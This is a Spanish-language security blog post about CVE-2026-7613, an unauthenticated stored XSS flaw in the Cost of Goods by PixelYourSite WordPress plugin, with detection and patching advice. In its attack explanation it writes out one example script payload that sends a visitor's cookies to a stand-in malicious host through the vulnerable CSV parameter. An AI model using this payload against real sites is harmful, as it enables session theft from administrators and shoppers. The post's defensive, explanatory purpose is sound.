CVE-2026-7613 es una vulnerabilidad de tipo XSS almacenado en el plugin Cost of Goods by PixelYourSite para WordPress que afecta todas las versiones hasta la 1.2.12 inclusive. Según el reporte oficial de Wordfence, cualquier atacante externo sin credenciales puede inyectar scripts maliciosos que quedan guardados en la base de datos y se ejecutan en el navegador de quien visita las páginas afectadas.

En 30 segundos

  • El plugin afectado es Cost of Goods by PixelYourSite, versiones hasta 1.2.12.
  • La falla es un XSS almacenado sin autenticación: cualquiera puede explotarla.
  • El vector CVSS:3.1 es AV:N/AC:L/PR:N/UI:N/S:C, lo que significa máxima accesibilidad remota y alcance extendido.
  • La solución es actualizar a la versión 1.2.13 o superior cuanto antes.
  • Si no usás el plugin activamente, desinstalarlo es la opción más segura.

Wordfence es un plugin de seguridad para WordPress desarrollado por Wordfence, Inc., que implementa firewall, detección de malware, protección contra fuerza bruta y monitoreo de vulnerabilidades.

CVE-2026-7613: Una vulnerabilidad XSS que no pide permiso

CVE-2026-7613 es el identificador oficial de una vulnerabilidad de Cross-Site Scripting almacenado descubierta en el plugin Cost of Goods by PixelYourSite para WordPress. El CVSS vector es CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N, lo que se traduce en: acceso remoto, complejidad baja, sin privilegios requeridos, sin interacción del usuario necesaria, y alcance que va más allá del componente afectado.

Eso es bastante serio.

Lo que más preocupa no es el score en sí, sino la combinación de factores: nadie necesita estar logueado para atacar. Un bot automatizado puede probar el endpoint, inyectar el payload, y el código queda guardado esperando que alguien lo active al visitar la página. Así funciona el XSS almacenado (o «persistente», como también lo llaman): no es un ataque puntual, es una trampa que el atacante deja instalada.

¿Qué plugin está afectado y quién lo usa?

cve-2026-7613 wordpress vulnerabilidad diagrama explicativo

Ponele que manejás una tienda WooCommerce y querés saber cuánto ganás por producto después de restar el costo real de cada ítem. Para eso existe Cost of Goods by PixelYourSite: te permite cargar el costo de cada producto y calcular márgenes de ganancia directamente desde el dashboard de WooCommerce.

Es un plugin funcional, bastante usado en tiendas pequeñas y medianas que no quieren pagar por soluciones de ERP complejas. El problema es que las versiones hasta la 1.2.12 tienen una falla crítica en el parámetro csvdata[cost_of_goods_value], que es el que se usa para importar datos de costos por CSV.

Ese parámetro no sanitiza correctamente lo que recibe ni escapa el output al renderizarlo. Resultado: cualquier valor que pase por ahí puede contener HTML y JavaScript arbitrario que WordPress va a mostrar sin filtros. Para más detalles técnicos, mirá comparativa entre Wordfence y Sucuri.

Cómo funciona el ataque: técnica del XSS almacenado

Un atacante prepara un archivo CSV o una petición al endpoint que corresponde al parámetro vulnerable. En el campo csvdata[cost_of_goods_value] mete algo como <script>document.location='https://sitio-malicioso.com/?c='+document.cookie</script>. Eso se envía al servidor sin autenticación.

WordPress procesa la importación, guarda el valor en la base de datos, y cuando un usuario (o el admin) visita la página de productos o los reportes asociados, el navegador ejecuta el script. Sin que el usuario haga nada especial. Sin alertas. Sin avisos. El código se ejecuta silenciosamente.

¿Y qué puede pasar en ese momento? Exacto, de todo.

Riesgos reales: qué puede hacer un atacante con esto

El impacto inmediato que documenta INCIBE-CERT está clasificado como confidencialidad: L (baja) e integridad: L (baja). Pero eso es el peor caso en escenario conservador. En la práctica, con un XSS almacenado sin autenticación en una tienda WooCommerce, los vectores reales incluyen:

  • Robo de cookies de sesión: si un admin visita la página afectada, el atacante captura su token y puede tomar control total del sitio.
  • Redirección de compradores: scripts que llevan a los clientes a páginas de phishing o a tiendas falsas que imitan la tuya.
  • Modificación visual de precios: mostrar precios distintos a distintos usuarios sin tocar la base de datos directamente.
  • Instalación de keyloggers: capturar datos de tarjetas de crédito al momento del checkout.
  • Descarga de malware secundario: usar el XSS como trampolín para inyectar código más persistente en el sitio.

Para una tienda en Argentina o Latam que procesa pagos, cualquiera de estos escenarios es un problema legal y reputacional serio. El robo de datos de clientes puede implicar responsabilidades bajo la Ley 25.326 de Protección de Datos Personales.

¿Estás afectado? Cómo verificar si tenés la versión vulnerable

Primer paso: ir a Plugins > Plugins instalados en tu dashboard de WordPress y buscar «Cost of Goods» o «PixelYourSite». Si lo tenés instalado, mirá el número de versión que aparece debajo del nombre.

Versiones vulnerables: 1.2.12 y anteriores. Versión segura: 1.2.13 o superior. Cubrimos ese tema en detalle en herramientas de detección de malware.

Si no aparece el plugin en tu lista, no tenés este problema puntual. Igual te recomiendo revisar con Wordfence Security si hay otro malware instalado, porque los ataques de XSS almacenado suelen dejarse caer en sitios que ya tenían otras brechas abiertas (y que nadie revisó).

Para un escaneo rápido: instalá o abrí Wordfence, andá a Wordfence > Scan, y ejecutá un escaneo completo. Si hay código inyectado en archivos o en la base de datos, el scanner lo va a marcar.

Pasos para protegerte de CVE-2026-7613 WordPress vulnerabilidad

Si usás el plugin, el camino es directo:

  • Actualizar a 1.2.13 o superior desde Plugins > Actualizaciones disponibles. Tarda dos minutos.
  • Después de actualizar, hacer un escaneo con Wordfence para confirmar que no quedó ningún payload inyectado antes de la actualización.
  • Revisar los logs de acceso: si tenés acceso a los logs del servidor, buscá peticiones POST al endpoint del plugin con contenido sospechoso en el parámetro csvdata.
  • Cambiar las contraseñas de admin si alguien con rol de editor o admin visitó páginas afectadas mientras la versión vulnerable estaba activa. Por las dudas.

Si no usás el plugin activamente: desinstalalo. Un plugin inactivo sigue siendo vulnerable si no está desinstalado. Tenerlo ahí «por si acaso» no tiene sentido.

Alternativas para calcular márgenes en WooCommerce

Si decidís no volver al plugin de PixelYourSite mientras esperás confirmar que la versión parcheada es estable, hay otras formas de manejar costos en WooCommerce:

  • WooCommerce Cost of Goods (de SkyVerge): plugin con buena trayectoria y updates regulares. No tiene vulnerabilidades conocidas activas a mayo 2026.
  • Directo en el meta de producto: WooCommerce te deja agregar campos personalizados de costo con un snippet en functions.php o via un plugin de campos custom como ACF. Más manual, pero sin dependencias externas.
  • Reportes de WooCommerce nativo: para tiendas pequeñas, los reportes de ganancias de WooCommerce 8.x tienen métricas básicas de margen si configurás correctamente los precios.

Ninguna de estas alternativas te va a resolver exactamente lo mismo que PixelYourSite, pero para tiendas con menos de 500 SKUs, la gestión manual o con campos ACF es perfectamente viable. Tema relacionado: últimas vulnerabilidades críticas reportadas.

Cómo evitar estas vulnerabilidades en el futuro

La raíz del problema en CVE-2026-7613 es técnica: falta de sanitización en el input y falta de escaping en el output. WordPress tiene funciones nativas para esto: sanitize_text_field(), wp_kses(), esc_html(), esc_attr(). Cuando un desarrollador de plugin omite estas funciones en campos que reciben datos externos, deja una puerta abierta.

Vos no podés controlar el código de un plugin de terceros, pero sí podés reducir la superficie de ataque:

  • Actualizaciones automáticas activadas para plugins activos. En WordPress 5.5+ podés habilitarlo por plugin desde el listado de plugins.
  • Auditoría antes de instalar: revisá la última fecha de actualización del plugin en el repositorio oficial. Si lleva más de 12 meses sin updates, buscá alternativa.
  • WAF activo: un firewall a nivel de aplicación (Wordfence en modo extendido, o a nivel de hosting) puede bloquear peticiones con payloads XSS conocidos antes de que lleguen a WordPress. Si tu hosting tiene soporte de WAF incluido, activalo.
  • Principio de mínimo privilegio: instalá solo los plugins que realmente usás. Cada plugin inactivo es deuda de seguridad.

Si tu sitio corre en un hosting con infraestructura actualizada y soporte de seguridad activo, ya tenés una capa de protección adicional. Donweb, por ejemplo, incluye protecciones a nivel de servidor que pueden mitigar ataques de este tipo antes de que lleguen a la aplicación.

Errores comunes al responder a este tipo de vulnerabilidades

Error 1: «Actualicé el plugin, listo». No necesariamente. Si el payload ya estaba inyectado antes de la actualización, actualizar el plugin no lo limpia. Tenés que hacer un escaneo de base de datos y archivos para confirmar que no quedó nada.

Error 2: «El plugin está desactivado, no hay riesgo». Un plugin desactivado en WordPress sigue cargando sus archivos en algunos contextos. La desactivación no es suficiente: si no lo usás, desinstalalo.

Error 3: «Esto no me afecta porque no tengo tráfico». El tráfico bajo no te protege de scanners automatizados. Los bots que buscan este tipo de endpoints no discriminan por tamaño de sitio. Un sitio con 50 visitas al mes es tan vulnerable como uno con 50.000. Ya lo cubrimos antes en defensa contra ataques DDoS.

Si querés profundizar, acá detallamos los riesgos de CVE-2026-7613.

Si querés profundizar en vulnerabilidades XSS, tenemos un análisis completo sobre CVE-2026-7613.

Si te interesa profundizar, tenemos todo el desglose en nuestro artículo sobre CVE-2026-7613.

Preguntas Frecuentes

¿Qué es CVE-2026-7613 y me afecta?

CVE-2026-7613 es una vulnerabilidad de XSS almacenado en el plugin Cost of Goods by PixelYourSite para WordPress, versiones hasta 1.2.12. Te afecta si tenés ese plugin instalado y activo en tu sitio. Si no usás este plugin, este CVE no es tu problema.

¿Cuál es la versión segura del plugin Cost of Goods?

La versión 1.2.13 corrige la vulnerabilidad. Verificá en Plugins > Actualizaciones disponibles que tenés 1.2.13 o superior instalada. Si el plugin no muestra actualización disponible, podés descargarlo directamente desde el repositorio oficial de PixelYourSite.

¿Tengo que desinstalar el plugin Cost of Goods?

Si no lo usás, desinstalalo directamente. Si lo usás activamente, actualizá a 1.2.13+ y luego hacé un escaneo con Wordfence para confirmar que no hay código malicioso residual. No hay motivo para dejar un plugin desactivado pero instalado.

¿Cómo sé si mi sitio fue atacado por esta vulnerabilidad XSS?

Ejecutá un escaneo completo con Wordfence (Wordfence > Scan). Revisá también los logs de acceso del servidor buscando peticiones POST con el parámetro csvdata y contenido sospechoso. Si ves redirecciones inesperadas o scripts extraños en el código fuente de tus páginas de productos, es una señal de que el payload ya fue inyectado.

¿Cómo protejo mi WordPress de vulnerabilidades XSS en general?

Tres capas básicas: mantenés todos los plugins actualizados (idealmente con actualizaciones automáticas habilitadas), instalás un firewall de aplicación como Wordfence en modo extendido, y auditás regularmente los plugins instalados eliminando los que no usás. El XSS por plugin de terceros es evitable si mantenés una buena higiene de actualización.

Conclusión

CVE-2026-7613 es un recordatorio de que las vulnerabilidades en plugins de nicho (los que usás para calcular márgenes, gestionar cupones, o integrar con APIs de terceros) son tan peligrosas como las de los plugins grandes. Justamente porque nadie las mira.

El plugin de PixelYourSite tenía una falla seria: aceptaba datos externos sin sanitizar y los mostraba sin escapar. Eso, combinado con que no requería autenticación, lo convierte en un objetivo atractivo para bots automatizados. Si lo tenés instalado en versión 1.2.12 o anterior, actualizá ahora. Si lo tenés desactivado, desinstalalo. Si no lo tenés, igual aprovechá para revisar cuántos plugins tenés sin actualizar en tu instalación.

La seguridad de un sitio WordPress no es una configuración de una vez: es un proceso continuo de actualizaciones, auditorías y reducción de superficie de ataque.

Fuentes

Categorizado en:

VulnerabilidadesCVE

Etiquetado en:

, , , ,